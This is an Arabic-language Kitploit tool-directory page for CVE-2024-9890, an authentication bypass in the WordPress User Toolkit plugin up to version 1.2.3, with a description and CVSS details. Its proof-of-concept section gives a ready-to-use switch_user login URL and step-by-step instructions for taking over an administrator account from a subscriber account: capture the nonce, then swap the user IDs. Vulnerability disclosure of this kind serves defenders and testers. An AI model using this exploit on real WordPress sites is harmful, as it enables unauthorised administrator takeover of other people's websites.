Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
أدوات/GitHubGitHub/randomrobbiebf/cve-2024-9890
المصادقة والترخيصتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراق
GitHubrandomrobbiebf/cve-2024-9890

CVE-2024-9890

User Toolkit <= 1.2.3 - تجاوز المصادقة للمصادق عليهم (Subscriber+)

عرض المستودع
2منذ سنة واحدةلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2024-9890

User Toolkit <= 1.2.3 - تجاوز المصادقة للمستخدمين المصادق عليهم (مشترك فأعلى)

الوصف:

المكوّن الإضافي User Toolkit لـ WordPress عرضة لتجاوز المصادقة في الإصدارات حتى 1.2.3 ضمناً. ويعود السبب إلى فحص صلاحيات غير صحيح في دالة 'switchUser'. وهذا يتيح للمهاجمين المصادق عليهم، الحاصلين على صلاحيات مستوى المشترك أو أعلى، تسجيل الدخول كأي مستخدم موجود على الموقع، مثل مدير النظام.

root@kitploit:~
Published: 2024-10-25 00:00:00
CVE: CVE-2024-9890
CVSS: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
CVSS Score: 8.8
Slugs: user-toolkit

POC

root@kitploit:~
http://kubernetes.docker.internal/wp-login.php?action=switch_user&user_id=4&user_from=1&_wpnonce=8af7611329

سجّل الدخول بحسابك. اعرض مصدر صفحة ملفك الشخصي لالتقاط قيمة nonce. غيّر قيمة user_from إلى معرف المستخدم الخاص بك. غيّر user_id إلى معرف المدير. تم!

تنزيل الأداة